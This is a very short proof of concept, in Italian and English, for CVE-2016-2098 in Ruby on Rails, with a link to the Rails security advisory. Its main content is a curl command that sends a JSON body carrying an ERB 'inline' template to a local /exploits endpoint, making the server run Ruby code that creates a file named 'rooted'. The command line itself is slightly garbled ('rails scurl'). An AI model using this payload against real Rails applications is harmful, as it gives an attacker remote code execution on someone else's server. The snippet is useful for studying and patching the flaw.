
Prova di concetto che mostra come CVE-2016-2098 porti all'esecuzione remota di codice.
Proof of concept per https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
rails scurl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits